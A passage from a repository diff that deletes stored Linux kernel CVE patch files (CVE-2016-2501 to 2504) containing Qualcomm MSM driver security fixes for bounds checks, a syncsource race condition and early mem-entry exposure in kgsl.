-@@ -5733,7 +5742,7 @@ VOS_STATUS iw_set_pno(struct net_device *dev, struct iw_request_info *info,
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
- "PNO data len %d data %s",
- wrqu->data.length,
-- wrqu->data.pointer);
-+ extra);
-
- if (wrqu->data.length <= nOffset )
- {
-@@ -5771,7 +5780,7 @@ VOS_STATUS iw_set_pno(struct net_device *dev, struct iw_request_info *info,
-
- scan every 5 seconds 2 times, scan every 300 seconds until stopped
- -----------------------------------------------------------------------*/
-- ptr = (char*)(wrqu->data.pointer + nOffset);
-+ ptr = extra + nOffset;
-
- sscanf(ptr,"%hhu%n", &(pnoRequest.enable), &nOffset);
-
-@@ -5982,7 +5991,7 @@ VOS_STATUS iw_set_rssi_filter(struct net_device *dev, struct iw_request_info *in
- v_U8_t rssiThreshold = 0;
- v_U8_t nRead;
-
-- nRead = sscanf(wrqu->data.pointer + nOffset,"%hhu",
-+ nRead = sscanf(extra + nOffset,"%hhu",
- &rssiThreshold);
-
- if ( 1 != nRead )
-@@ -6143,7 +6152,7 @@ static int iw_set_band_config(struct net_device *dev,
- union iwreq_data *wrqu, char *extra)
- {
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-- tANI_U8 *ptr = (tANI_U8*)wrqu->data.pointer;
-+ tANI_U8 *ptr = extra;
- int ret = 0;
-
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,"%s: ", __func__);
-@@ -6190,7 +6199,7 @@ VOS_STATUS iw_set_power_params(struct net_device *dev, struct iw_request_info *i
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
- "Power Params data len %d data %s",
- wrqu->data.length,
-- wrqu->data.pointer);
-+ extra);
-
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
- {
-@@ -6232,7 +6241,7 @@ VOS_STATUS iw_set_power_params(struct net_device *dev, struct iw_request_info *i
- powerRequest.uEnableBET = SIR_NOCHANGE_POWER_VALUE;
- powerRequest.uBETInterval = SIR_NOCHANGE_POWER_VALUE;
-
-- ptr = (char*)(wrqu->data.pointer + nOffset);
-+ ptr = extra + nOffset;
-
- while ( uTotalSize )
- {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2501/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2501/ANY/0001.patch
deleted file mode 100644
index a03745c2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2501/ANY/0001.patch
+++ /dev/null
@@ -1,96 +0,0 @@
-From 0ee6c6f748e840c266fe26ed3c89d6bd7e3c9d4e Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula
-Date: Wed, 13 Apr 2016 14:31:58 -0700
-Subject: msm: camera: sensor: Validate step_boundary
-
-step_boundary can take values upto the total_steps
-Validate the step_boundary before consuming it.
-Convert the type of step_index and region_index to uint16_t
-step_index and region_index cannot be negative.
-
-CRs-Fixed: 1001092
-Change-Id: I1f23fd6f28bb897824a1ef99a8873b9f986eee70
-Signed-off-by: Rajesh Bondugula
----
- .../msm/camera_v2/sensor/actuator/msm_actuator.c | 35 ++++++++++++++++++----
- 1 file changed, 29 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index 7653b1b..b87e31e 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -853,7 +853,7 @@ static int32_t msm_actuator_bivcm_init_step_table(
- {
- int16_t code_per_step = 0;
- int16_t cur_code = 0;
-- int16_t step_index = 0, region_index = 0;
-+ uint16_t step_index = 0, region_index = 0;
- uint16_t step_boundary = 0;
- uint32_t max_code_size = 1;
- uint16_t data_size = set_info->actuator_params.data_size;
-@@ -894,6 +894,15 @@ static int32_t msm_actuator_bivcm_init_step_table(
- step_boundary =
- a_ctrl->region_params[region_index].
- step_bound[MOVE_NEAR];
-+ if (step_boundary >
-+ set_info->af_tuning_params.total_steps) {
-+ pr_err("invalid step_boundary = %d, max_val = %d",
-+ step_boundary,
-+ set_info->af_tuning_params.total_steps);
-+ kfree(a_ctrl->step_position_table);
-+ a_ctrl->step_position_table = NULL;
-+ return -EINVAL;
-+ }
- qvalue = a_ctrl->region_params[region_index].qvalue;
- for (; step_index <= step_boundary;
- step_index++) {
-@@ -929,20 +938,25 @@ static int32_t msm_actuator_init_step_table(struct msm_actuator_ctrl_t *a_ctrl,
- int16_t code_per_step = 0;
- uint32_t qvalue = 0;
- int16_t cur_code = 0;
-- int16_t step_index = 0, region_index = 0;
-+ uint16_t step_index = 0, region_index = 0;
- uint16_t step_boundary = 0;
- uint32_t max_code_size = 1;
- uint16_t data_size = set_info->actuator_params.data_size;
- CDBG("Enter\n");
-
-+ /* validate the actuator state */
-+ if (a_ctrl->actuator_state != ACT_OPS_ACTIVE) {
-+ pr_err("%s:%d invalid actuator_state %d\n"
-+ , __func__, __LINE__, a_ctrl->actuator_state);
-+ return -EINVAL;
-+ }
- for (; data_size > 0; data_size--)
- max_code_size *= 2;
-
- a_ctrl->max_code_size = max_code_size;
-- if ((a_ctrl->actuator_state == ACT_OPS_ACTIVE) &&
-- (a_ctrl->step_position_table != NULL)) {
-- kfree(a_ctrl->step_position_table);
-- }
-+
-+ /* free the step_position_table to allocate a new one */
-+ kfree(a_ctrl->step_position_table);
- a_ctrl->step_position_table = NULL;
-
- if (set_info->af_tuning_params.total_steps
-@@ -971,6 +985,15 @@ static int32_t msm_actuator_init_step_table(struct msm_actuator_ctrl_t *a_ctrl,
- step_boundary =
- a_ctrl->region_params[region_index].
- step_bound[MOVE_NEAR];
-+ if (step_boundary >
-+ set_info->af_tuning_params.total_steps) {
-+ pr_err("invalid step_boundary = %d, max_val = %d",
-+ step_boundary,
-+ set_info->af_tuning_params.total_steps);
-+ kfree(a_ctrl->step_position_table);
-+ a_ctrl->step_position_table = NULL;
-+ return -EINVAL;
-+ }
- for (; step_index <= step_boundary;
- step_index++) {
- if (qvalue > 1 && qvalue <= MAX_QVALUE)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2502/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2502/ANY/0001.patch
deleted file mode 100644
index 0fc56780..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2502/ANY/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 0bc45d7712eabe315ce8299a49d16433c3801156 Mon Sep 17 00:00:00 2001
-From: Manu Gautam
-Date: Tue, 5 Apr 2016 15:20:47 +0530
-Subject: usb: f_serial: Check for SMD data length in GSER_IOCTL
-
-If user tries to send SMD data more than the driver
-buffer can handle then fail the same and print
-error message. This smd_write is exposed to userspace
-through ioctl using a misc device.
-
-Change-Id: Ie8a1c1c0799cd10cef512ad6b1e1e95001dd43b2
-Signed-off-by: Manu Gautam
----
- drivers/usb/gadget/f_serial.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/usb/gadget/f_serial.c b/drivers/usb/gadget/f_serial.c
-index 8d510e1..4e84de8 100644
---- a/drivers/usb/gadget/f_serial.c
-+++ b/drivers/usb/gadget/f_serial.c
-@@ -1361,6 +1361,13 @@ static long gser_ioctl(struct file *fp, unsigned cmd, unsigned long arg)
- smd_port_num =
- gserial_ports[gser->port_num].client_port_num;
-
-+ if (smd_write_arg.size > GSERIAL_BUF_LEN) {
-+ pr_err("%s: Invalid size:%u, max: %u", __func__,
-+ smd_write_arg.size, GSERIAL_BUF_LEN);
-+ ret = -EINVAL;
-+ break;
-+ }
-+
- pr_debug("%s: Copying %d bytes from user buffer to local\n",
- __func__, smd_write_arg.size);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2503/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-2503/3.10/0001.patch
deleted file mode 100644
index ddefe228..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2503/3.10/0001.patch
+++ /dev/null
@@ -1,102 +0,0 @@
-From 0c46fc0f8fb7ffd26557b51b235d463a01ee75f5 Mon Sep 17 00:00:00 2001
-From: Divya Ponnusamy
-Date: Fri, 6 May 2016 13:24:37 -0600
-Subject: msm: kgsl: Avoid race condition in ioctl_syncsource_destroy
-
-If the ioctl syncsource_destroy is accessed by parallel
-threads, where the spinlock is acquired by threads after
-getting syncsource, then the simultaneous processes try
-to remove the already destroyed syncsource->refcount by
-the first thread that acquires this spinlock. This leads
-to race condition while removing syncsource->idr.
-
-Avoid separate lock inside getting syncsource, instead
-acquire spinlock before we get the syncsource in
-destroy ioctl so that the threads access the spinlock
-and operate on syncsource without use-after-free issue.
-
-Change-Id: I6add3800c40cd09f6e6e0cf2720e69059bd83cbc
-Signed-off-by: Divya Ponnusamy
----
- drivers/gpu/msm/kgsl_sync.c | 36 +++++++++++++++++-------------------
- 1 file changed, 17 insertions(+), 19 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl_sync.c b/drivers/gpu/msm/kgsl_sync.c
-index 44a0f11..df181ad 100644
---- a/drivers/gpu/msm/kgsl_sync.c
-+++ b/drivers/gpu/msm/kgsl_sync.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -473,23 +473,23 @@ long kgsl_ioctl_syncsource_create(struct kgsl_device_private *dev_priv,
- goto out;
- }
-
-+ kref_init(&syncsource->refcount);
-+ syncsource->private = private;
-+
- idr_preload(GFP_KERNEL);
- spin_lock(&private->syncsource_lock);
- id = idr_alloc(&private->syncsource_idr, syncsource, 1, 0, GFP_NOWAIT);
-- spin_unlock(&private->syncsource_lock);
-- idr_preload_end();
--
- if (id > 0) {
-- kref_init(&syncsource->refcount);
- syncsource->id = id;
-- syncsource->private = private;
--
- param->id = id;
- ret = 0;
- } else {
- ret = id;
- }
-
-+ spin_unlock(&private->syncsource_lock);
-+ idr_preload_end();
-+
- out:
- if (ret) {
- if (syncsource && syncsource->oneshot)
-@@ -547,25 +547,23 @@ long kgsl_ioctl_syncsource_destroy(struct kgsl_device_private *dev_priv,
- {
- struct kgsl_syncsource_destroy *param = data;
- struct kgsl_syncsource *syncsource = NULL;
-- struct kgsl_process_private *private;
--
-- syncsource = kgsl_syncsource_get(dev_priv->process_priv,
-- param->id);
-+ struct kgsl_process_private *private = dev_priv->process_priv;
-
-- if (syncsource == NULL)
-- return -EINVAL;
-+ spin_lock(&private->syncsource_lock);
-+ syncsource = idr_find(&private->syncsource_idr, param->id);
-
-- private = syncsource->private;
-+ if (syncsource) {
-+ idr_remove(&private->syncsource_idr, param->id);
-+ syncsource->id = 0;
-+ }
-
-- spin_lock(&private->syncsource_lock);
-- idr_remove(&private->syncsource_idr, param->id);
-- syncsource->id = 0;
- spin_unlock(&private->syncsource_lock);
-
-+ if (syncsource == NULL)
-+ return -EINVAL;
-+
- /* put reference from syncsource creation */
- kgsl_syncsource_put(syncsource);
-- /* put reference from getting the syncsource above */
-- kgsl_syncsource_put(syncsource);
- return 0;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2503/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-2503/3.18/0002.patch
deleted file mode 100644
index 2ac901a1..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2503/3.18/0002.patch
+++ /dev/null
@@ -1,102 +0,0 @@
-From 9ae71bc3a542f68ea93c4eff01a41201ee6d9402 Mon Sep 17 00:00:00 2001
-From: Divya Ponnusamy
-Date: Fri, 6 May 2016 13:24:37 -0600
-Subject: msm: kgsl: Avoid race condition in ioctl_syncsource_destroy
-
-If the ioctl syncsource_destroy is accessed by parallel
-threads, where the spinlock is acquired by threads after
-getting syncsource, then the simultaneous processes try
-to remove the already destroyed syncsource->refcount by
-the first thread that acquires this spinlock. This leads
-to race condition while removing syncsource->idr.
-
-Avoid separate lock inside getting syncsource, instead
-acquire spinlock before we get the syncsource in
-destroy ioctl so that the threads access the spinlock
-and operate on syncsource without use-after-free issue.
-
-Change-Id: I6add3800c40cd09f6e6e0cf2720e69059bd83cbc
-Signed-off-by: Divya Ponnusamy
----
- drivers/gpu/msm/kgsl_sync.c | 36 +++++++++++++++++-------------------
- 1 file changed, 17 insertions(+), 19 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl_sync.c b/drivers/gpu/msm/kgsl_sync.c
-index abbdc5d..5c3ae1b 100644
---- a/drivers/gpu/msm/kgsl_sync.c
-+++ b/drivers/gpu/msm/kgsl_sync.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -474,23 +474,23 @@ long kgsl_ioctl_syncsource_create(struct kgsl_device_private *dev_priv,
- goto out;
- }
-
-+ kref_init(&syncsource->refcount);
-+ syncsource->private = private;
-+
- idr_preload(GFP_KERNEL);
- spin_lock(&private->syncsource_lock);
- id = idr_alloc(&private->syncsource_idr, syncsource, 1, 0, GFP_NOWAIT);
-- spin_unlock(&private->syncsource_lock);
-- idr_preload_end();
--
- if (id > 0) {
-- kref_init(&syncsource->refcount);
- syncsource->id = id;
-- syncsource->private = private;
--
- param->id = id;
- ret = 0;
- } else {
- ret = id;
- }
-
-+ spin_unlock(&private->syncsource_lock);
-+ idr_preload_end();
-+
- out:
- if (ret) {
- if (syncsource && syncsource->oneshot)
-@@ -548,25 +548,23 @@ long kgsl_ioctl_syncsource_destroy(struct kgsl_device_private *dev_priv,
- {
- struct kgsl_syncsource_destroy *param = data;
- struct kgsl_syncsource *syncsource = NULL;
-- struct kgsl_process_private *private;
--
-- syncsource = kgsl_syncsource_get(dev_priv->process_priv,
-- param->id);
-+ struct kgsl_process_private *private = dev_priv->process_priv;
-
-- if (syncsource == NULL)
-- return -EINVAL;
-+ spin_lock(&private->syncsource_lock);
-+ syncsource = idr_find(&private->syncsource_idr, param->id);
-
-- private = syncsource->private;
-+ if (syncsource) {
-+ idr_remove(&private->syncsource_idr, param->id);
-+ syncsource->id = 0;
-+ }
-
-- spin_lock(&private->syncsource_lock);
-- idr_remove(&private->syncsource_idr, param->id);
-- syncsource->id = 0;
- spin_unlock(&private->syncsource_lock);
-
-+ if (syncsource == NULL)
-+ return -EINVAL;
-+
- /* put reference from syncsource creation */
- kgsl_syncsource_put(syncsource);
-- /* put reference from getting the syncsource above */
-- kgsl_syncsource_put(syncsource);
- return 0;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2504/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-2504/3.18/0002.patch
deleted file mode 100644
index 63e5b99b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2504/3.18/0002.patch
+++ /dev/null
@@ -1,80 +0,0 @@
-From 75adbb8cebfe17ace640e6bd89582c1d72196378 Mon Sep 17 00:00:00 2001
-From: Jordan Crouse
-Date: Tue, 3 May 2016 14:11:03 -0600
-Subject: msm: kgsl: Defer adding the mem entry to a process
-
-If we add the mem entry pointer in the process mem_idr too early
-other threads can do operations on the entry by guessing the ID
-or GPU address before the object gets returned by the creating
-operation.
-
-Allocate an ID for the object but don't assign the pointer until
-right before the creating function returns ensuring that another
-operation can't access it until it is ready.
-
-CRs-Fixed: 1002974
-Change-Id: Ic0dedbadc0dd2125bd2a7bcc152972c0555e07f8
-Signed-off-by: Jordan Crouse
----
- drivers/gpu/msm/kgsl.c | 17 ++++++++++++++++-
- 1 file changed, 16 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 738b2f4..8e68a88 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -388,6 +388,17 @@ kgsl_mem_entry_untrack_gpuaddr(struct kgsl_process_private *process,
- kgsl_mmu_put_gpuaddr(pagetable, &entry->memdesc);
- }
-
-+/* Commit the entry to the process so it can be accessed by other operations */
-+static void kgsl_mem_entry_commit_process(struct kgsl_mem_entry *entry)
-+{
-+ if (!entry)
-+ return;
-+
-+ spin_lock(&entry->priv->mem_lock);
-+ idr_replace(&entry->priv->mem_idr, entry, entry->id);
-+ spin_unlock(&entry->priv->mem_lock);
-+}
-+
- /**
- * kgsl_mem_entry_attach_process - Attach a mem_entry to its owner process
- * @entry: the memory entry
-@@ -418,7 +429,8 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry,
-
- idr_preload(GFP_KERNEL);
- spin_lock(&process->mem_lock);
-- id = idr_alloc(&process->mem_idr, entry, 1, 0, GFP_NOWAIT);
-+ /* Allocate the ID but don't attach the pointer just yet */
-+ id = idr_alloc(&process->mem_idr, NULL, 1, 0, GFP_NOWAIT);
- spin_unlock(&process->mem_lock);
- idr_preload_end();
-
-@@ -2317,6 +2329,7 @@ long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
-
- trace_kgsl_mem_map(entry, fd);
-
-+ kgsl_mem_entry_commit_process(entry);
- return 0;
-
- unmap:
-@@ -2580,6 +2593,7 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
-
- trace_kgsl_mem_map(entry, param->fd);
-
-+ kgsl_mem_entry_commit_process(entry);
- return result;
-
- error_attach:
-@@ -2971,6 +2985,7 @@ static struct kgsl_mem_entry *gpumem_alloc_entry(
- entry->memdesc.size);
- trace_kgsl_mem_alloc(entry);
-
-+ kgsl_mem_entry_commit_process(entry);
- return entry;
- err:
- kfree(entry);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2504/3.4-^3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-2504/3.4-^3.10/0001.patch
deleted file mode 100644
index e15d8a6f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2504/3.4-^3.10/0001.patch
+++ /dev/null
@@ -1,164 +0,0 @@
-From f7c8dfd7060867d71fc370527e2e2278ffc3ba5e Mon Sep 17 00:00:00 2001
-From: Sunil Khatri
-Date: Wed, 25 May 2016 21:13:46 +0530
-Subject: msm: kgsl: Defer adding the mem entry to a process
-
-If we add the mem entry pointer in the process idr and rb tree
-too early, other threads can do operations on the entry by
-guessing the ID or GPU address before the object gets returned
-by the creating operation.
-
-Allocate an ID for the object but don't assign the pointer until
-right before the creating function returns ensuring that another
-operation can't access it until it is ready.
-
-CRs-Fixed: 1002974
-Change-Id: Ic0dedbadc0dd2125bd2a7bcc152972c0555e07f8
-Signed-off-by: Jordan Crouse
-Signed-off-by: Sunil Khatri
----
- drivers/gpu/msm/kgsl.c | 62 +++++++++++++++++++++++++++++++++++---------------
- 1 file changed, 44 insertions(+), 18 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index e1fd99e..ad1e4e0 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -296,27 +296,20 @@ kgsl_mem_entry_destroy(struct kref *kref)
- EXPORT_SYMBOL(kgsl_mem_entry_destroy);
-
- /**
-- * kgsl_mem_entry_track_gpuaddr - Insert a mem_entry in the address tree and
-- * assign it with a gpu address space before insertion
-+ * kgsl_mem_entry_track_gpuaddr - Get the entry gpu address space before
-+ * insertion to the process
- * @process: the process that owns the memory
- * @entry: the memory entry
- *
-- * @returns - 0 on succcess else error code
-+ * @returns - 0 on success else error code
- *
-- * Insert the kgsl_mem_entry in to the rb_tree for searching by GPU address.
-- * The assignment of gpu address and insertion into list needs to
-- * happen with the memory lock held to avoid race conditions between
-- * gpu address being selected and some other thread looking through the
-- * rb list in search of memory based on gpuaddr
- * This function should be called with processes memory spinlock held
-- */
-+*/
- static int
- kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- struct kgsl_mem_entry *entry)
- {
- int ret = 0;
-- struct rb_node **node;
-- struct rb_node *parent = NULL;
- struct kgsl_pagetable *pagetable = process->pagetable;
-
- assert_spin_locked(&process->mem_lock);
-@@ -337,11 +330,22 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- pagetable = pagetable->mmu->securepagetable;
-
- ret = kgsl_mmu_get_gpuaddr(pagetable, &entry->memdesc);
-- if (ret)
-- goto done;
-
-- node = &process->mem_rb.rb_node;
-+done:
-+ return ret;
-+}
-+
-+static void kgsl_mem_entry_commit_mem_list(struct kgsl_process_private *process,
-+ struct kgsl_mem_entry *entry)
-+{
-+ struct rb_node **node;
-+ struct rb_node *parent = NULL;
-+
-+ if (!entry->memdesc.gpuaddr)
-+ return;
-
-+ /* Insert mem entry in mem_rb tree */
-+ node = &process->mem_rb.rb_node;
- while (*node) {
- struct kgsl_mem_entry *cur;
-
-@@ -356,9 +360,20 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
-
- rb_link_node(&entry->node, parent, node);
- rb_insert_color(&entry->node, &process->mem_rb);
-+}
-
--done:
-- return ret;
-+static void kgsl_mem_entry_commit_process(struct kgsl_process_private *process,
-+ struct kgsl_mem_entry *entry)
-+{
-+ if (!entry)
-+ return;
-+
-+ spin_lock(&entry->priv->mem_lock);
-+ /* Insert mem entry in mem_rb tree */
-+ kgsl_mem_entry_commit_mem_list(process, entry);
-+ /* Replace mem entry in mem_idr using id */
-+ idr_replace(&entry->priv->mem_idr, entry, entry->id);
-+ spin_unlock(&entry->priv->mem_lock);
- }
-
- /**
-@@ -407,7 +422,8 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry,
- return -EBADF;
- idr_preload(GFP_KERNEL);
- spin_lock(&process->mem_lock);
-- id = idr_alloc(&process->mem_idr, entry, 1, 0, GFP_NOWAIT);
-+ /* Allocate the ID but don't attach the pointer just yet */
-+ id = idr_alloc(&process->mem_idr, NULL, 1, 0, GFP_NOWAIT);
- spin_unlock(&process->mem_lock);
- idr_preload_end();
-
-@@ -3279,6 +3295,7 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
-
- trace_kgsl_mem_map(entry, param->fd);
-
-+ kgsl_mem_entry_commit_process(private, entry);
- return result;
-
- error_attach:
-@@ -3633,6 +3650,8 @@ long kgsl_ioctl_gpumem_alloc(struct kgsl_device_private *dev_priv,
- param->gpuaddr = entry->memdesc.gpuaddr;
- param->size = entry->memdesc.size;
- param->flags = entry->memdesc.flags;
-+
-+ kgsl_mem_entry_commit_process(private, entry);
- return result;
- err:
- kgsl_sharedmem_free(&entry->memdesc);
-@@ -3678,6 +3697,8 @@ long kgsl_ioctl_gpumem_alloc_id(struct kgsl_device_private *dev_priv,
- param->size = entry->memdesc.size;
- param->mmapsize = kgsl_memdesc_mmapsize(&entry->memdesc);
- param->gpuaddr = entry->memdesc.gpuaddr;
-+
-+ kgsl_mem_entry_commit_process(private, entry);
- return result;
- err:
- if (entry)
-@@ -4201,6 +4222,11 @@ static int kgsl_check_gpu_addr_collision(
- spin_lock(&private->mem_lock);
- kgsl_mem_entry_untrack_gpuaddr(private, entry);
- spin_unlock(&private->mem_lock);
-+ } else {
-+ /* Insert mem entry in mem_rb tree */
-+ spin_lock(&private->mem_lock);
-+ kgsl_mem_entry_commit_mem_list(private, entry);
-+ spin_unlock(&private->mem_lock);
- }
- } else {
- trace_kgsl_mem_unmapped_area_collision(entry, addr, len,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2504/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-2504/ANY/0003.patch
deleted file mode 100644
index 0afa3534..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2504/ANY/0003.patch
+++ /dev/null
@@ -1,180 +0,0 @@ -From ec5feea777b07c0e1f9ce45b7f3179a3f6facf75 Mon Sep 17 00:00:00 2001 -From: Sunil Khatri -Date: Wed, 25 May 2016 15:36:30 +0530 -Subject: msm: kgsl: Defer adding the mem entry to a process - -If we add the mem entry pointer in the process idr and rb tree -too early, other threads can do operations on the entry by -guessing the ID or GPU address before the object gets returned -by the creating operation. - -Allocate an ID for the object but don't assign the pointer until -right before the creating function returns ensuring that another -operation can't access it until it is ready. - -CRs-Fixed: 1002974 -Change-Id: Ic0dedbadc0dd2125bd2a7bcc152972c0555e07f8 -Signed-off-by: Jordan Crouse -Signed-off-by: Sunil Khatri ---- - drivers/gpu/msm/kgsl.c | 84 ++++++++++++++++++++++++++++++++------------------ - 1 file changed, 54 insertions(+), 30 deletions(-) - -diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c -index 94b09f0..dab99c5 100644 ---- a/drivers/gpu/msm/kgsl.c -+++ b/drivers/gpu/msm/kgsl.c -@@ -313,18 +313,13 @@ kgsl_mem_entry_destroy(struct kref *kref) - EXPORT_SYMBOL(kgsl_mem_entry_destroy); - - /** -- * kgsl_mem_entry_track_gpuaddr - Insert a mem_entry in the address tree and -- * assign it with a gpu address space before insertion -+ * kgsl_mem_entry_track_gpuaddr - Get the entry gpu address space before -+ * insertion to the process - * @process: the process that owns the memory - * @entry: the memory entry - * -- * @returns - 0 on succcess else error code -+ * @returns - 0 on success else error code - * -- * Insert the kgsl_mem_entry in to the rb_tree for searching by GPU address. 
-- * The assignment of gpu address and insertion into list needs to -- * happen with the memory lock held to avoid race conditions between -- * gpu address being selected and some other thread looking through the -- * rb list in search of memory based on gpuaddr - * This function should be called with processes memory spinlock held - */ - static int -@@ -332,8 +327,6 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process, - struct kgsl_mem_entry *entry) - { - int ret = 0; -- struct rb_node **node; -- struct rb_node *parent = NULL; - struct kgsl_pagetable *pagetable = process->pagetable; - - assert_spin_locked(&process->mem_lock); -@@ -354,25 +347,6 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process, - pagetable = pagetable->mmu->securepagetable; - - ret = kgsl_mmu_get_gpuaddr(pagetable, &entry->memdesc); -- if (ret) -- goto done; -- -- node = &process->mem_rb.rb_node; -- -- while (*node) { -- struct kgsl_mem_entry *cur; -- -- parent = *node; -- cur = rb_entry(parent, struct kgsl_mem_entry, node); -- -- if (entry->memdesc.gpuaddr < cur->memdesc.gpuaddr) -- node = &parent->rb_left; -- else -- node = &parent->rb_right; -- } -- -- rb_link_node(&entry->node, parent, node); -- rb_insert_color(&entry->node, &process->mem_rb); - - done: - return ret; -@@ -398,6 +372,47 @@ kgsl_mem_entry_untrack_gpuaddr(struct kgsl_process_private *process, - } - } - -+static void kgsl_mem_entry_commit_mem_list(struct kgsl_process_private *process, -+ struct kgsl_mem_entry *entry) -+{ -+ struct rb_node **node; -+ struct rb_node *parent = NULL; -+ -+ if (!entry->memdesc.gpuaddr) -+ return; -+ -+ /* Insert mem entry in mem_rb tree */ -+ node = &process->mem_rb.rb_node; -+ while (*node) { -+ struct kgsl_mem_entry *cur; -+ -+ parent = *node; -+ cur = rb_entry(parent, struct kgsl_mem_entry, node); -+ -+ if (entry->memdesc.gpuaddr < cur->memdesc.gpuaddr) -+ node = &parent->rb_left; -+ else -+ node = &parent->rb_right; -+ } -+ -+ rb_link_node(&entry->node, parent, 
node); -+ rb_insert_color(&entry->node, &process->mem_rb); -+} -+ -+static void kgsl_mem_entry_commit_process(struct kgsl_process_private *process, -+ struct kgsl_mem_entry *entry) -+{ -+ if (!entry) -+ return; -+ -+ spin_lock(&entry->priv->mem_lock); -+ /* Insert mem entry in mem_rb tree */ -+ kgsl_mem_entry_commit_mem_list(process, entry); -+ /* Replace mem entry in mem_idr using id */ -+ idr_replace(&entry->priv->mem_idr, entry, entry->id); -+ spin_unlock(&entry->priv->mem_lock); -+} -+ - /** - * kgsl_mem_entry_attach_process - Attach a mem_entry to its owner process - * @entry: the memory entry -@@ -424,7 +439,8 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry, - return -EBADF; - idr_preload(GFP_KERNEL); - spin_lock(&process->mem_lock); -- id = idr_alloc(&process->mem_idr, entry, 1, 0, GFP_NOWAIT); -+ /* Allocate the ID but don't attach the pointer just yet */ -+ id = idr_alloc(&process->mem_idr, NULL, 1, 0, GFP_NOWAIT); - spin_unlock(&process->mem_lock); - idr_preload_end(); - -@@ -2400,6 +2416,7 @@ long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv, - - trace_kgsl_mem_map(entry, fd); - -+ kgsl_mem_entry_commit_process(private, entry); - return 0; - - unmap: -@@ -2671,6 +2688,7 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv, - - trace_kgsl_mem_map(entry, param->fd); - -+ kgsl_mem_entry_commit_process(private, entry); - return result; - - error_attach: -@@ -3084,6 +3102,7 @@ static struct kgsl_mem_entry *gpumem_alloc_entry( - entry->memdesc.size); - trace_kgsl_mem_alloc(entry); - -+ kgsl_mem_entry_commit_process(private, entry); - return entry; - err: - kfree(entry); -@@ -3579,6 +3598,11 @@ static int kgsl_check_gpu_addr_collision( - spin_lock(&private->mem_lock); - kgsl_mem_entry_untrack_gpuaddr(private, entry); - spin_unlock(&private->mem_lock); -+ } else { 